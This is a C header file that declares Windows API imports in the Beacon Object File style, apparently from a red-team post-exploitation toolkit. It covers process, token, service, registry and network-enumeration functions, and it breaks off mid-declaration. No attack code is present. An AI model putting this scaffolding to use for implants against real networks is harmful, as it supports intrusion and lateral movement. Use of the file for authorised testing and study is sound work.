-------------------------------------------------------------------------------- /common/bofdefs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #pragma intrinsic(memcmp, memcpy,strcpy,strcmp,_stricmp,strlen) 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | //KERNEL32 18 | #ifdef BOF 19 | WINBASEAPI void * WINAPI KERNEL32$VirtualAlloc (LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect); 20 | WINBASEAPI int WINAPI KERNEL32$VirtualFree (LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType); 21 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalAlloc (UINT, SIZE_T); 22 | DECLSPEC_IMPORT HLOCAL WINAPI KERNEL32$LocalFree (HLOCAL); 23 | WINBASEAPI void * WINAPI KERNEL32$HeapAlloc (HANDLE hHeap, DWORD dwFlags, SIZE_T dwBytes); 24 | WINBASEAPI LPVOID WINAPI KERNEL32$HeapReAlloc (HANDLE hHeap, DWORD dwFlags, LPVOID lpMem, SIZE_T dwBytes); 25 | WINBASEAPI HANDLE WINAPI KERNEL32$GetProcessHeap(); 26 | WINBASEAPI BOOL WINAPI KERNEL32$HeapFree (HANDLE, DWORD, PVOID); 27 | WINBASEAPI DWORD WINAPI KERNEL32$FormatMessageA (DWORD dwFlags, LPCVOID lpSource, DWORD dwMessageId, DWORD dwLanguageId, LPSTR lpBuffer, DWORD nSize, va_list *Arguments); 28 | WINBASEAPI int WINAPI Kernel32$WideCharToMultiByte (UINT CodePage, DWORD dwFlags, LPCWCH lpWideCharStr, int cchWideChar, LPSTR lpMultiByteStr, int cbMultiByte, LPCCH lpDefaultChar, LPBOOL lpUsedDefaultChar); 29 | WINBASEAPI int WINAPI KERNEL32$FileTimeToLocalFileTime (CONST FILETIME *lpFileTime, LPFILETIME lpLocalFileTime); 30 | WINBASEAPI int WINAPI KERNEL32$FileTimeToSystemTime (CONST FILETIME *lpFileTime, LPSYSTEMTIME lpSystemTime); 31 | WINBASEAPI int WINAPI KERNEL32$GetDateFormatW (LCID Locale, DWORD dwFlags, CONST SYSTEMTIME *lpDate, LPCWSTR lpFormat, LPWSTR lpDateStr, int cchDate); 32 | WINBASEAPI VOID WINAPI KERNEL32$GetSystemTimeAsFileTime (LPFILETIME lpSystemTimeAsFileTime); 33 | WINBASEAPI VOID WINAPI KERNEL32$GetLocalTime (LPSYSTEMTIME lpSystemTime); 34 | WINBASEAPI WINBOOL WINAPI KERNEL32$SystemTimeToFileTime (CONST SYSTEMTIME *lpSystemTime, LPFILETIME lpFileTime); 35 | WINBASEAPI WINBOOL WINAPI KERNEL32$SystemTimeToTzSpecificLocalTime (CONST TIME_ZONE_INFORMATION *lpTimeZoneInformation, CONST SYSTEMTIME *lpUniversalTime, LPSYSTEMTIME lpLocalTime); 36 | WINBASEAPI WINBOOL WINAPI KERNEL32$GlobalMemoryStatusEx (LPMEMORYSTATUSEX lpBuffer); 37 | WINBASEAPI WINBOOL WINAPI KERNEL32$GetDiskFreeSpaceExA (LPCSTR lpDirectoryName, PULARGE_INTEGER lpFreeBytesAvailableToCaller, PULARGE_INTEGER lpTotalNumberOfBytes, PULARGE_INTEGER lpTotalNumberOfFreeBytes); 38 | WINBASEAPI HANDLE WINAPI KERNEL32$GetCurrentProcess (VOID); 39 | DECLSPEC_IMPORT DWORD KERNEL32$GetCurrentProcessId(VOID); 40 | WINBASEAPI DWORD WINAPI KERNEL32$GetLastError (VOID); 41 | WINBASEAPI WINBOOL WINAPI KERNEL32$CloseHandle (HANDLE hObject); 42 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateThread (LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); 43 | WINBASEAPI DWORD WINAPI KERNEL32$GetTickCount (VOID); 44 | WINBASEAPI ULONGLONG WINAPI KERNEL32$GetTickCount64 (VOID); 45 | WINBASEAPI LPVOID WINAPI KERNEL32$CreateFiber (SIZE_T dwStackSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter); 46 | WINBASEAPI LPVOID WINAPI KERNEL32$ConvertThreadToFiber (LPVOID lpParameter); 47 | WINBASEAPI WINBOOL WINAPI KERNEL32$ConvertFiberToThread (VOID); 48 | WINBASEAPI VOID WINAPI KERNEL32$DeleteFiber (LPVOID lpFiber); 49 | WINBASEAPI VOID WINAPI KERNEL32$SwitchToFiber (LPVOID lpFiber); 50 | WINBASEAPI DWORD WINAPI KERNEL32$WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 51 | WINBASEAPI VOID WINAPI KERNEL32$Sleep (DWORD dwMilliseconds); 52 | WINBASEAPI WINBOOL WINAPI KERNEL32$DeleteFileW (LPCWSTR lpFileName); 53 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateFileW (LPCWSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 54 | WINBASEAPI DWORD WINAPI KERNEL32$GetFileSize (HANDLE hFile, LPDWORD lpFileSizeHigh); 55 | WINBASEAPI WINBOOL WINAPI KERNEL32$ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); 56 | WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess (DWORD dwDesiredAccess, WINBOOL bInheritHandle, DWORD dwProcessId); 57 | WINBASEAPI WINBOOL WINAPI KERNEL32$GetComputerNameExW (COMPUTER_NAME_FORMAT NameType, LPWSTR lpBuffer, LPDWORD nSize); 58 | WINBASEAPI int WINAPI KERNEL32$lstrlenW (LPCWSTR lpString); 59 | WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcatW (LPWSTR lpString1, LPCWSTR lpString2); 60 | WINBASEAPI LPWSTR WINAPI KERNEL32$lstrcpynW (LPWSTR lpString1, LPCWSTR lpString2, int iMaxLength); 61 | WINBASEAPI DWORD WINAPI KERNEL32$GetFullPathNameW (LPCWSTR lpFileName, DWORD nBufferLength, LPWSTR lpBuffer, LPWSTR *lpFilePart); 62 | WINBASEAPI DWORD WINAPI KERNEL32$GetFileAttributesW (LPCWSTR lpFileName); 63 | WINBASEAPI DWORD WINAPI KERNEL32$GetCurrentDirectoryW (DWORD nBufferLength, LPWSTR lpBuffer); 64 | WINBASEAPI HANDLE WINAPI KERNEL32$FindFirstFileW (LPCWSTR lpFileName, LPWIN32_FIND_DATAW lpFindFileData); 65 | WINBASEAPI HANDLE WINAPI KERNEL32$FindFirstFileA (char * lpFileName, LPWIN32_FIND_DATA lpFindFileData); 66 | WINBASEAPI WINBOOL WINAPI KERNEL32$FindNextFileW (HANDLE hFindFile, LPWIN32_FIND_DATAW lpFindFileData); 67 | WINBASEAPI WINBOOL WINAPI KERNEL32$FindNextFileA (HANDLE hFindFile, LPWIN32_FIND_DATA lpFindFileData); 68 | WINBASEAPI WINBOOL WINAPI KERNEL32$FindClose (HANDLE hFindFile); 69 | WINBASEAPI VOID WINAPI KERNEL32$SetLastError (DWORD dwErrCode); 70 | #define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 71 | #define intRealloc(ptr, size) (ptr) ? KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, ptr, size) : KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 72 | #define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr) 73 | #define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size) 74 | DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalAlloc(UINT uFlags, SIZE_T dwBytes); 75 | DECLSPEC_IMPORT HGLOBAL KERNEL32$GlobalFree(HGLOBAL hMem); 76 | DECLSPEC_IMPORT LPTCH WINAPI KERNEL32$GetEnvironmentStrings(); 77 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$FreeEnvironmentStringsA(LPSTR); 78 | WINBASEAPI DWORD WINAPI KERNEL32$ExpandEnvironmentStringsW (LPCWSTR lpSrc, LPWSTR lpDst, DWORD nSize); 79 | WINBASEAPI HANDLE WINAPI KERNEL32$CreateToolhelp32Snapshot(DWORD dwFlags,DWORD th32ProcessID); 80 | WINBASEAPI WINBOOL WINAPI KERNEL32$Process32First(HANDLE hSnapshot,LPPROCESSENTRY32 lppe); 81 | WINBASEAPI WINBOOL WINAPI KERNEL32$Process32Next(HANDLE hSnapshot,LPPROCESSENTRY32 lppe); 82 | WINBASEAPI WINBOOL WINAPI KERNEL32$Module32First(HANDLE hSnapshot,LPMODULEENTRY32 lpme); 83 | WINBASEAPI WINBOOL WINAPI KERNEL32$Module32Next(HANDLE hSnapshot,LPMODULEENTRY32 lpme); 84 | WINBASEAPI HMODULE WINAPI KERNEL32$LoadLibraryA (LPCSTR lpLibFileName); 85 | WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress (HMODULE hModule, LPCSTR lpProcName); 86 | WINBASEAPI WINBOOL WINAPI KERNEL32$FreeLibrary (HMODULE hLibModule); 87 | DECLSPEC_IMPORT WINBASEAPI int WINAPI KERNEL32$lstrlenA(LPCSTR); 88 | DECLSPEC_IMPORT int WINAPI KERNEL32$GetLocaleInfoEx(LPCWSTR lpLocaleName, LCTYPE LCType, LPWSTR lpLCData, int cchData); 89 | WINBASEAPI int WINAPI KERNEL32$GetSystemDefaultLocaleName(LPCWSTR lpLocaleName, int cchLocaleName); 90 | DECLSPEC_IMPORT LCID WINAPI KERNEL32$LocaleNameToLCID(LPCWSTR lpName, DWORD dwFlags); 91 | DECLSPEC_IMPORT int WINAPI KERNEL32$GetDateFormatEx(LPCWSTR lpLocaleName, DWORD dwFlags, const SYSTEMTIME *lpData, LPCWSTR lpFormat, LPWSTR lpDateStr, int cchDate, LPCWSTR lpCalendar); 92 | 93 | 94 | //WTSAPI32 95 | DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSEnumerateSessionsA(LPVOID, DWORD, DWORD, PWTS_SESSION_INFO*, DWORD*); 96 | DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSQuerySessionInformationA(LPVOID, DWORD, WTS_INFO_CLASS , LPSTR*, DWORD*); 97 | DECLSPEC_IMPORT DWORD WINAPI WTSAPI32$WTSFreeMemory(PVOID); 98 | 99 | //Iphlpapi.lib 100 | //ULONG WINAPI IPHLPAPI$GetAdaptersInfo (PIP_ADAPTER_INFO AdapterInfo, PULONG SizePointer); 101 | DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetAdaptersInfo(PIP_ADAPTER_INFO,PULONG); 102 | DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetIpForwardTable (PMIB_IPFORWARDTABLE pIpForwardTable, PULONG pdwSize, WINBOOL bOrder); 103 | DECLSPEC_IMPORT DWORD WINAPI IPHLPAPI$GetNetworkParams(PFIXED_INFO,PULONG); 104 | DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetUdpTable (PMIB_UDPTABLE UdpTable, PULONG SizePointer, WINBOOL Order); 105 | DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetTcpTable (PMIB_TCPTABLE TcpTable, PULONG SizePointer, WINBOOL Order); 106 | DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetIpNetTable(PMIB_IPNETTABLE IpNetTable,PULONG SizePointer, BOOL Order); 107 | 108 | //MSVCRT 109 | WINBASEAPI char *__cdecl MSVCRT$_ultoa(unsigned long _Value,char *_Dest,int _Radix); 110 | WINBASEAPI void *__cdecl MSVCRT$calloc(size_t _NumOfElements, size_t _SizeOfElements); 111 | WINBASEAPI void *__cdecl MSVCRT$memcpy(void * __restrict__ _Dst,const void * __restrict__ _Src,size_t _MaxCount); 112 | WINBASEAPI int __cdecl MSVCRT$memcmp(const void *_Buf1,const void *_Buf2,size_t _Size); 113 | WINBASEAPI void *__cdecl MSVCRT$realloc(void *_Memory, size_t _NewSize); 114 | WINBASEAPI void __cdecl MSVCRT$free(void *_Memory); 115 | WINBASEAPI void __cdecl MSVCRT$memset(void *dest, int c, size_t count); 116 | WINBASEAPI int __cdecl MSVCRT$sprintf(char *__stream, const char *__format, ...); 117 | WINBASEAPI int __cdecl MSVCRT$vsnprintf(char * __restrict__ d,size_t n,const char * __restrict__ format,va_list arg); 118 | WINBASEAPI int __cdecl MSVCRT$_snwprintf(wchar_t * __restrict__ _Dest,size_t _Count,const wchar_t * __restrict__ _Format,...); 119 | WINBASEAPI errno_t __cdecl MSVCRT$wcscpy_s(wchar_t *_Dst, rsize_t _DstSize, const wchar_t *_Src); 120 | WINBASEAPI size_t __cdecl MSVCRT$wcslen(const wchar_t *_Str); 121 | WINBASEAPI size_t __cdecl MSVCRT$wcstombs(char * __restrict__ _Dest,const wchar_t * __restrict__ _Source,size_t _MaxCount); 122 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcscmp(const wchar_t *_lhs,const wchar_t *_rhs); 123 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcstok(wchar_t * __restrict__ _Str,const wchar_t * __restrict__ _Delim); 124 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcstok_s(wchar_t *_Str,const wchar_t *_Delim,wchar_t **_Context); 125 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcsstr(const wchar_t *_Str,const wchar_t *_SubStr); 126 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcscat(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Source); 127 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcsncat(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source, size_t _Count); 128 | WINBASEAPI wchar_t *__cdecl MSVCRT$strncat(char * __restrict__ _Dest,const char * __restrict__ _Source, size_t _Count); 129 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcscpy(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source); 130 | WINBASEAPI int __cdecl MSVCRT$_wcsicmp(const wchar_t *_Str1,const wchar_t *_Str2); 131 | WINBASEAPI int __cdecl MSVCRT$_wcsnicmp(const wchar_t *_Str1,const wchar_t *_Str2, size_t _Count); 132 | WINBASEAPI int __cdecl MSVCRT$_strnicmp(const char *_Str1,const char *_Str2, size_t _Count); 133 | WINBASEAPI _CONST_RETURN wchar_t *__cdecl MSVCRT$wcschr(const wchar_t *_Str, wchar_t _Ch); 134 | 135 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcsrchr(const wchar_t *_Str,wchar_t _Ch); 136 | WINBASEAPI wchar_t *__cdecl MSVCRT$wcsrchr(const wchar_t *_Str,wchar_t _Ch); 137 | WINBASEAPI unsigned long __cdecl MSVCRT$wcstoul(const wchar_t * __restrict__ _Str,wchar_t ** __restrict__ _EndPtr,int _Radix); 138 | DECLSPEC_IMPORT char * __cdecl MSVCRT$strcat(char * __restrict__ _Dest,const char * __restrict__ _Source); 139 | WINBASEAPI size_t __cdecl MSVCRT$strnlen(const char *_Str,size_t _MaxCount); 140 | WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str); 141 | DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2); 142 | DECLSPEC_IMPORT int __cdecl MSVCRT$_stricmp(const char *string1,const char *string2); 143 | WINBASEAPI int __cdecl MSVCRT$strncmp(const char *_Str1,const char *_Str2,size_t _MaxCount); 144 | DECLSPEC_IMPORT char * __cdecl MSVCRT$strcpy(char * __restrict__ __dst, const char * __restrict__ __src); 145 | DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strstr(const char *haystack, const char *needle); 146 | DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strchr(const char *haystack, int needle); 147 | DECLSPEC_IMPORT char *__cdecl MSVCRT$strtok(char * __restrict__ _Str,const char * __restrict__ _Delim); 148 | _CRTIMP char *__cdecl MSVCRT$strtok_s(char *_Str,const char *_Delim,char **_Context); 149 | WINBASEAPI unsigned long __cdecl MSVCRT$strtoul(const char * __restrict__ _Str,char ** __restrict__ _EndPtr,int _Radix); 150 | WINBASEAPI size_t __cdecl MSVCRT$strftime(char *_DstBuf,size_t _SizeInBytes,const char *_Format,const struct tm *_Tm); 151 | WINBASEAPI struct tm * __cdecl MSVCRT$gmtime(const time_t *_Time); 152 | WINBASEAPI wchar_t * __cdecl MSVCRT$wcsncat(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Source,size_t _Count); 153 | 154 | //DNSAPI 155 | DECLSPEC_IMPORT DNS_STATUS WINAPI DNSAPI$DnsQuery_A(PCSTR,WORD,DWORD,PIP4_ARRAY,PDNS_RECORD*,PVOID*); 156 | DECLSPEC_IMPORT VOID WINAPI DNSAPI$DnsFree(PVOID pData,DNS_FREE_TYPE FreeType); 157 | 158 | //WSOCK32 159 | DECLSPEC_IMPORT unsigned long __stdcall WSOCK32$inet_addr(const char *cp); 160 | 161 | //NETAPI32 162 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); 163 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetInfo(LPCWSTR servername,LPCWSTR username,DWORD level,LPBYTE *bufptr); 164 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserModalsGet(LPCWSTR servername,DWORD level,LPBYTE *bufptr); 165 | WINBASEAPI DWORD WINAPI NETAPI32$NetServerEnum(LMCSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,DWORD servertype,LMCSTR domain,LPDWORD resume_handle); 166 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetGroups(LPCWSTR servername,LPCWSTR username,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries); 167 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetLocalGroups(LPCWSTR servername,LPCWSTR username,DWORD level,DWORD flags,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries); 168 | WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer); 169 | WINBASEAPI DWORD WINAPI NETAPI32$NetGetAnyDCName(LPCWSTR servername,LPCWSTR domainname,LPBYTE *bufptr); 170 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserEnum(LPCWSTR servername,DWORD level,DWORD filter,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resume_handle); 171 | WINBASEAPI DWORD WINAPI NETAPI32$NetGroupGetUsers(LPCWSTR servername,LPCWSTR groupname,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR ResumeHandle); 172 | WINBASEAPI DWORD WINAPI NETAPI32$NetQueryDisplayInformation(LPCWSTR ServerName,DWORD Level,DWORD Index,DWORD EntriesRequested,DWORD PreferredMaximumLength,LPDWORD ReturnedEntryCount,PVOID *SortedBuffer); 173 | WINBASEAPI DWORD WINAPI NETAPI32$NetLocalGroupEnum(LPCWSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR resumehandle); 174 | WINBASEAPI DWORD WINAPI NETAPI32$NetLocalGroupGetMembers(LPCWSTR servername,LPCWSTR localgroupname,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR resumehandle); 175 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserSetInfo(LPCWSTR servername,LPCWSTR username,DWORD level,LPBYTE buf,LPDWORD parm_err); 176 | WINBASEAPI DWORD WINAPI NETAPI32$NetShareEnum(LMSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resume_handle); 177 | WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer); 178 | WINBASEAPI DWORD WINAPI NETAPI32$NetSessionEnum(LPCWSTR servername, LPCWSTR UncClientName, LPCWSTR username, DWORD level, LPBYTE* bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resumehandle); 179 | WINBASEAPI DWORD WINAPI NETAPI32$NetWkstaUserEnum(LMSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resumehandle); 180 | WINBASEAPI DWORD WINAPI NETAPI32$NetWkstaGetInfo(LMSTR servername,DWORD level,LPBYTE *bufptr); 181 | WINBASEAPI DWORD WINAPI NETAPI32$NetStatisticsGet(LMSTR server,LMSTR service,DWORD level,DWORD options,LPBYTE *bufptr); 182 | WINBASEAPI DWORD WINAPI NETAPI32$NetRemoteTOD(LPCWSTR UncServerName,LPBYTE *BufferPtr); 183 | 184 | //mpr 185 | WINBASEAPI DWORD WINAPI MPR$WNetOpenEnumW(DWORD dwScope, DWORD dwType, DWORD dwUsage, LPNETRESOURCEW lpNetResource, LPHANDLE lphEnum); 186 | WINBASEAPI DWORD WINAPI MPR$WNetEnumResourceW(HANDLE hEnum, LPDWORD lpcCount, LPVOID lpBuffer, LPDWORD lpBufferSize); 187 | WINBASEAPI DWORD WINAPI MPR$WNetCloseEnum(HANDLE hEnum); 188 | WINBASEAPI DWORD WINAPI MPR$WNetGetNetworkInformationW(LPCWSTR lpProvider, LPNETINFOSTRUCT lpNetInfoStruct); 189 | WINBASEAPI DWORD WINAPI MPR$WNetGetConnectionW(LPCWSTR lpLocalName, LPWSTR lpRemoteName, LPDWORD lpnLength); 190 | WINBASEAPI DWORD WINAPI MPR$WNetGetResourceInformationW(LPNETRESOURCEW lpNetResource, LPVOID lpBuffer, LPDWORD lpcbBuffer, LPWSTR *lplpSystem); 191 | WINBASEAPI DWORD WINAPI MPR$WNetGetUserW(LPCWSTR lpName, LPWSTR lpUserName, LPDWORD lpnLength); 192 | WINBASEAPI DWORD WINAPI MPR$WNetAddConnection2W(LPNETRESOURCEW lpNetResource, LPCWSTR lpPassword, LPCWSTR lpUserName, DWORD dwFlags); 193 | WINBASEAPI DWORD WINAPI MPR$WNetCancelConnection2W(LPCWSTR lpName, DWORD dwFlags, BOOL fForce); 194 | 195 | //user32 196 | WINUSERAPI int WINAPI USER32$EnumDesktopWindows(HDESK hDesktop,WNDENUMPROC lpfn,LPARAM lParam); 197 | WINUSERAPI int WINAPI USER32$IsWindowVisible (HWND hWnd); 198 | WINUSERAPI int WINAPI USER32$GetWindowTextA(HWND hWnd,LPSTR lpString,int nMaxCount); 199 | WINUSERAPI int WINAPI USER32$GetClassNameA(HWND hWnd,LPSTR lpClassName,int nMaxCount); 200 | WINUSERAPI LPWSTR WINAPI USER32$CharPrevW(LPCWSTR lpszStart,LPCWSTR lpszCurrent); 201 | WINUSERAPI HWND WINAPI USER32$FindWindowExA (HWND hWndParent, HWND hWndChildAfter, LPCSTR lpszClass, LPCSTR lpszWindow); 202 | WINUSERAPI LRESULT WINAPI USER32$SendMessageA (HWND hwnd, UINT Msg, WPARAM wParam, LPARAM lParam); 203 | WINUSERAPI int WINAPI USER32$GetWindowTextA(HWND hWnd, LPSTR lpString, int nMaxCount); 204 | WINUSERAPI int WINAPI USER32$GetClassNameA(HWND hWnd, LPTSTR lpClassName, int nMaxCount); 205 | WINUSERAPI BOOL WINAPI USER32$EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam); 206 | 207 | //secur32 208 | WINBASEAPI BOOLEAN WINAPI SECUR32$GetUserNameExA (int NameFormat, LPSTR lpNameBuffer, PULONG nSize); 209 | 210 | //shlwapi 211 | WINBASEAPI LPSTR WINAPI SHLWAPI$StrStrIA(LPCSTR lpFirst,LPCSTR lpSrch); 212 | WINBASEAPI int WINAPI SHLWAPI$SHFormatDateTimeA(const FILETIME *pft, DWORD *pdwFlags, LPSTR *pszBuf, UINT cchBuf); 213 | 214 | //advapi32 215 | WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle); 216 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetTokenInformation (HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength); 217 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSidToStringSidA(PSID Sid,LPSTR *StringSid); 218 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW(LPCWSTR StringSecurityDescriptor,DWORD StringSDRevision,PSECURITY_DESCRIPTOR *SecurityDescriptor,PULONG SecurityDescriptorSize); 219 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidA (LPCSTR lpSystemName, PSID Sid, LPSTR Name, LPDWORD cchName, LPSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse); 220 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidW (LPCWSTR lpSystemName, PSID Sid, LPWSTR Name, LPDWORD cchName, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse); 221 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeNameA (LPCSTR lpSystemName, PLUID lpLuid, LPSTR lpName, LPDWORD cchName); 222 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeDisplayNameA (LPCSTR lpSystemName, LPCSTR lpName, LPSTR lpDisplayName, LPDWORD cchDisplayName, LPDWORD lpLanguageId); 223 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName,LPCSTR lpDatabaseName,DWORD dwDesiredAccess); 224 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,DWORD dwDesiredAccess); 225 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceStatus(SC_HANDLE hService,LPSERVICE_STATUS lpServiceStatus); 226 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceConfigA(SC_HANDLE hService,LPQUERY_SERVICE_CONFIGA lpServiceConfig,DWORD cbBufSize,LPDWORD pcbBytesNeeded); 227 | WINADVAPI WINBOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE hSCObject); 228 | WINADVAPI WINBOOL WINAPI ADVAPI32$EnumServicesStatusExA(SC_HANDLE hSCManager,SC_ENUM_TYPE InfoLevel,DWORD dwServiceType,DWORD dwServiceState,LPBYTE lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned,LPDWORD lpResumeHandle,LPCSTR pszGroupName); 229 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceStatusEx(SC_HANDLE hService,SC_STATUS_TYPE InfoLevel,LPBYTE lpBuffer,DWORD cbBufSize,LPDWORD pcbBytesNeeded); 230 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceConfig2A(SC_HANDLE hService,DWORD dwInfoLevel,LPBYTE lpBuffer,DWORD cbBufSize,LPDWORD pcbBytesNeeded); 231 | WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfig2A(SC_HANDLE hService,DWORD dwInfoLevel,LPVOID lpInfo); 232 | WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfigA(SC_HANDLE hService,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword,LPCSTR lpDisplayName); 233 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$CreateServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,LPCSTR lpDisplayName,DWORD dwDesiredAccess,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword); 234 | WINADVAPI WINBOOL WINAPI ADVAPI32$DeleteService(SC_HANDLE hService); 235 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExW(HKEY hKey,LPCWSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult); 236 | WINADVAPI WINBOOL WINAPI ADVAPI32$EnumServicesStatusExW(SC_HANDLE hSCManager,SC_ENUM_TYPE InfoLevel,DWORD dwServiceType,DWORD dwServiceState,LPBYTE lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned,LPDWORD lpResumeHandle,LPCWSTR pszGroupName); 237 | WINADVAPI LONG WINAPI ADVAPI32$RegCreateKeyA(HKEY hKey,LPCSTR lpSubKey,PHKEY phkResult); 238 | WINADVAPI LONG WINAPI ADVAPI32$RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,CONST BYTE *lpData,DWORD cbData); 239 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD ulOptions,REGSAM 